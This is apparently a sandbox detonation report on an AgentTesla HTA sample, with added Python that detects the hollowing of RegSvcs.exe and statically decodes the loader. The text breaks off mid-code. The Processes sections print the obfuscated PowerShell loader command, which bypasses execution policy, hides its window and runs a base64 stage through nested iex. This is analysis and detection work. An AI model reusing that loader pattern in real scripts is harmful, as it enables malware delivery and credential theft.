Malware Analysis Report

2024-12-07 14:10

Sample ID 241112-htsjzaxelr
Target creatingnextleeverthingswithentireprocessgetitinonlineback.hta
SHA256 204746f8c96c400d222b811d71cbb1f4adcb684eb432efb25d648a8828922e26
Tags: agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

204746f8c96c400d222b811d71cbb1f4adcb684eb432efb25d648a8828922e26

Threat Level: Known bad

The file creatingnextleeverthingswithentireprocessgetitinonlineback.hta was found to be: Known bad.

Malicious Activity Summary

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx

AgentTesla

Agenttesla family

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

AutoIT Executable

Suspicious use of SetThreadContext

UPX packed file

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 07:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 07:02

Reported

2024-11-12 07:04

Platform

win7-20240903-en

Max time kernel

119s

Max time network

125s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2688 set thread context of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2080 wrote to memory of 1792 (4 events) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 1792 wrote to memory of 1664 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 2820 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2804 (4 events) N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1792 wrote to memory of 2688 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2688 wrote to memory of 2428 (8 events) N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta"

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'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'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxac5_nc.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCED4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCED3.tmp"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

Network

Country Destination Domain Proto
US 192.3.176.141:80 192.3.176.141 tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 16aab4b2935658f831582a9054bee876
SHA1 6d83b0b4609275c619b2d4cb154bcfb68bb5a6e0
SHA256 5001ff5cb95547fde49a67bd259610c0af854debb5294b5790ee2095eef10b83
SHA512 4c230b99a68ef428f16d3230b28823f8a531752b613995d811e70fe744b6e076d2d6266921d18f2dda4179445cb19287f08f891c65aec4132c8c129ba745e4c7

\??\c:\Users\Admin\AppData\Local\Temp\sxac5_nc.cmdline

MD5 8264948b00211174301f0847ee00f84e
SHA1 5f611c045f2907a3924374f3498fc0c896b3a603
SHA256 d7fe8ef700deba4b60809f4298e6c665b04aa7b584e76856cfe81b43a9b655fb
SHA512 f2bfc3ddd4991edfe8597e5a46361892d05df07d5b2cedb8e38a8a61c95737c3c080c7857f2c7caee2072d742b59f76719ea9c95bf1ad00211b166031ada9dd5

\??\c:\Users\Admin\AppData\Local\Temp\sxac5_nc.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

C:\Users\Admin\AppData\Local\Temp\RESCED4.tmp

MD5 1cdcb100a9fdf02707b589a93bdc7069
SHA1 4ce94f74afdc0b4b8d4b83510bbe1ac085fd513d
SHA256 73394b6df1433cade63a06ac85f2998dd4b174da695e79e6f2512744c29109bd
SHA512 fcd3afc2e4e3068edad1be0f556575333eb32d12460e9083285e5a5b8f4aadc85d18df63d5c88ab47a28747428ccb0ec3f1a81ce61a25957a421095dae9072c6

\??\c:\Users\Admin\AppData\Local\Temp\CSCCED3.tmp

MD5 c507b1d21d78efdb602804e9edd49605
SHA1 de24aad7bbc793222f9738fdac7e6397996cdb51
SHA256 4d6318240894d4c14b10e9d27709fcffce7ed48e508a2f3a6789db739c1c945e
SHA512 c3d39b226090d827e2e2962067a02fed11cd125375929288868ebc7ea8f0ed013b518a146150006c03643fec61702cf08348bb1a849c2c9853d9086b2f9679fc

C:\Users\Admin\AppData\Local\Temp\sxac5_nc.dll

MD5 ffde0009a2622000f3283d0f22c30651
SHA1 ac99781d54a4f730c23c13845d101e671ca5ad26
SHA256 81415573a73028ad192f9c30d5c362fa72589d1c7a7851d8a128cb0f686c2beb
SHA512 0eef627022e5376aee616d9e9fd1b8b08e4a16a2e8b628b40936bb88f5dd622650e06ac90102d06b32ef95fce81a10064317bbaf2b6a795b4cc0626871b374e4

C:\Users\Admin\AppData\Local\Temp\sxac5_nc.pdb

MD5 ac1fccc746d6fd7f9acebb6cc410ce08
SHA1 f4a6fb7393009b8cf2227aacd8e69aa147c0d88b
SHA256 34f807ca8e8756edb708ee874083928cede95d0f31ec61026866eb1658ea336f
SHA512 75aa07a4a4ca0ca3a59d7e7dde0b3222c99a03b0ccac9958a357b9d0efd4130cd2d55660a1bf5ca55da79600d31089cc9f5f761bdfdfddd437be784bde501e71

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/1792-31-0x0000000006640000-0x000000000684D000-memory.dmp

memory/2688-33-0x0000000000D20000-0x0000000000F2D000-memory.dmp

memory/2428-35-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2428-36-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2688-38-0x0000000000D20000-0x0000000000F2D000-memory.dmp

memory/2428-39-0x0000000000360000-0x00000000003B4000-memory.dmp

memory/2428-40-0x0000000000450000-0x00000000004A2000-memory.dmp

memory/2428-56-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-100-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-98-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-96-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-94-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-92-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-90-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-88-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-86-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-84-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-82-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-80-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-78-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-76-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-74-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-72-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-70-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-68-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-66-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-62-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-60-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-58-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-54-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-52-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-50-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-48-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-46-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-44-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-42-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-64-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-41-0x0000000000450000-0x000000000049D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 07:02

Reported

2024-11-12 07:04

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

152s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4280 set thread context of 784 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4856 wrote to memory of 3064 (3 events) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 3064 wrote to memory of 4500 (3 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 1196 (3 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1196 wrote to memory of 3632 (3 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3064 wrote to memory of 4280 (3 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 4280 wrote to memory of 784 (4 events) N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
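The WriteProcessMemory and SetThreadContext rows of both detonations (behavioral1 above and this one) record the same chain: mshta.exe starts an obfuscated PowerShell, which spawns a second PowerShell, compiles C# at run time through csc.exe and cvtres.exe (the .cmdline, .0.cs and .dll files in the Files lists are what Add-Type leaves behind), drops winnit.exe into AppData\Roaming and runs it, and winnit.exe then both writes into RegSvcs.exe and sets its thread context. That last pair is process hollowing, and it is why the Processes lists show an image of RegSvcs.exe running with winnit.exe's command line. The Python below is an added example, not part of the report or of any sandbox's code. It parses the behavioral1 rows (copied inline with the repeated rows dropped) and raises the findings a detection engineer would want from them. It assumes the sandbox's first "wrote to memory of" from a parent into a freshly created child marks the spawn, so the write relation can stand in for the process tree; that is an inference from this report, not a documented guarantee, and a lone WriteProcessMemory is never treated as injection on its own.

```python
import ntpath
import re
from collections import namedtuple

# Rows copied from this report's behavioral1 "Suspicious use of WriteProcessMemory"
# and "Suspicious use of SetThreadContext" tables (repeated rows dropped).
SAMPLE_EVENTS = r"""
PID 2080 wrote to memory of 1792 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 1792 wrote to memory of 1664 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 2820 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1792 wrote to memory of 2688 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 set thread context of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"""

Event = namedtuple("Event", "src_pid action dst_pid src_image dst_image")
LINE_RE = re.compile(
    r"PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)$"
)

# Signed Microsoft .NET utilities that AgentTesla-style loaders commonly hollow.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}


def parse_events(text):
    """Parse the injection-related rows; lines in any other shape are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            src, action, dst, src_img, dst_img = m.groups()
            events.append(Event(int(src), action, int(dst), src_img, dst_img))
    return events


def base(path):
    """Lower-cased image file name; ntpath handles the backslash paths on any OS."""
    return ntpath.basename(path).lower()


def images(events):
    """PID -> image path, taken from whichever column the PID appears in."""
    img = {}
    for e in events:
        img[e.src_pid] = e.src_image
        img[e.dst_pid] = e.dst_image
    return img


def parents(events):
    """Child PID -> parent PID. ASSUMPTION: the first write from a parent into a
    new child is the sandbox recording the spawn, so it doubles as the tree."""
    tree = {}
    for e in events:
        if e.action == "wrote to memory of" and e.src_pid != e.dst_pid:
            tree.setdefault(e.dst_pid, e.src_pid)
    return tree


def lineage(events, pid):
    """Image names from the root of the tree down to pid."""
    tree, img = parents(events), images(events)
    chain = [pid]
    while chain[-1] in tree:
        chain.append(tree[chain[-1]])
    return [base(img[p]) for p in reversed(chain)]


def find_hollowing(events):
    """A process that both writes into a target and sets its thread context is
    replacing the target's code and redirecting a thread into it (hollowing)."""
    writes = {(e.src_pid, e.dst_pid) for e in events if e.action == "wrote to memory of"}
    ctx = {(e.src_pid, e.dst_pid) for e in events if e.action == "set thread context of"}
    img = images(events)
    return [(base(img[s]), base(img[d])) for s, d in sorted(writes & ctx)]


def findings(events):
    """Human-readable detections over the parsed rows."""
    img, out = images(events), []
    for child, parent in sorted(parents(events).items()):
        p, c = base(img[parent]), base(img[child])
        if p == "mshta.exe" and c == "powershell.exe":
            out.append(f"mshta.exe (PID {parent}) launched PowerShell (PID {child})")
        if p == "powershell.exe" and c == "csc.exe":
            out.append(f"PowerShell (PID {parent}) compiled C# at run time via csc.exe (PID {child})")
        if p == "powershell.exe" and c.endswith(".exe") and "\\appdata\\roaming\\" in img[child].lower():
            out.append(f"PowerShell (PID {parent}) executed dropped {c} from AppData\\Roaming (PID {child})")
    for src, dst in find_hollowing(events):
        host = "Microsoft .NET host " if dst in DOTNET_HOSTS else ""
        out.append(f"{src} hollowed {host}{dst}: WriteProcessMemory + SetThreadContext on the same target")
    return out


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print(" -> ".join(lineage(evs, 2428)))
    for f in findings(evs):
        print("*", f)
```

Run as-is it prints the lineage mshta.exe -> powershell.exe -> winnit.exe -> regsvcs.exe and four findings. Feeding it the behavioral2 rows (PIDs 4856, 3064, 4500, 1196, 3632, 4280, 784) gives the same four findings with different PIDs, which is the point: the detection keys on the parent/child images and the write-plus-context pair, not on anything the sample can vary between runs.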

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'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'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wmtbpe4r\wmtbpe4r.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9913.tmp" "c:\Users\Admin\AppData\Local\Temp\wmtbpe4r\CSC2F2BB2682638407FB6CE27D663A9546B.TMP"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"
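The PowerShell command line mshta.exe launches (identical in both detonations) assembles its second stage at run time. `[ChAR]58+[CHAR]0x3A` and `[CHaR]58+[CHAr]58` are both `::`, `[Char]34` and `[cHaR]0x22` are `"`, so the inner iEX builds `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` and evaluates it, and the outer iex runs whatever text that decodes to. `-w 1` is `-WindowStyle Hidden`, `-Ex bypasS` is `-ExecutionPolicy Bypass`, and `DeviceCredentialDeployment` is the cmdlet the "Evasion via Device Credential Deployment" signature keys on; it is called for its side effect of hiding the console window. The Python below is an added example, not code from the report. Because the page elides the real base64 blob, it substitutes a constructed stand-in payload (STANDIN_STAGE, hypothetical) and shows how to fold the concatenation and recover the decoded text without ever running PowerShell.

```python
import base64
import re

# Constructed stand-in for the second stage: the report elides the real base64
# blob, so this decoded text is made up for the demo (hypothetical).
STANDIN_STAGE = "Start-Sleep 1; Write-Output stage2"
STANDIN_B64 = base64.b64encode(STANDIN_STAGE.encode("utf-8")).decode("ascii")

# The argument mshta.exe hands to powERsHeLl.eXe in this report, with the elided
# blob replaced by STANDIN_B64. Everything else is verbatim from the report.
SAMPLE_ARG = (
    "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; "
    "iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'"
    "+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'" + STANDIN_B64 + "'+[cHaR]0x22+'))')))"
)

# One concatenation piece: a single-quoted literal or a [char]N / [char]0xNN cast.
PIECE_RE = re.compile(r"'([^']*)'|\[char\](0x[0-9a-f]+|\d+)", re.IGNORECASE)
B64_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)


def join_pieces(expr):
    """Fold a PowerShell 'lit'+[char]N+'lit' expression into the string it yields."""
    out = []
    for lit, code in PIECE_RE.findall(expr):
        if code:
            out.append(chr(int(code, 16) if code.lower().startswith("0x") else int(code)))
        else:
            out.append(lit)
    return "".join(out)


def innermost_iex_argument(cmdline):
    """Text after the last 'iex(' is the expression the innermost iex evaluates."""
    starts = [m.end() for m in re.finditer(r"iex\(", cmdline, re.IGNORECASE)]
    if not starts:
        raise ValueError("no iex( call found")
    return cmdline[starts[-1]:]


def decode_stage(cmdline):
    """Undo both iex layers: rebuild the inner string, then decode its base64 blob.
    Returns (reconstructed inner string, decoded second-stage text)."""
    inner = join_pieces(innermost_iex_argument(cmdline))
    m = B64_RE.search(inner)
    if not m:
        raise ValueError("reconstructed string has no FromBase64String(...) call")
    return inner, base64.b64decode(m.group(1)).decode("utf-8")


def evasion_switches(cmdline):
    """The hide-and-bypass switches present in the command line, in a fixed order."""
    hits = []
    if re.search(r"-ex(?:ecutionpolicy)?\s+bypass", cmdline, re.IGNORECASE):
        hits.append("ExecutionPolicy Bypass")
    if re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", cmdline, re.IGNORECASE):
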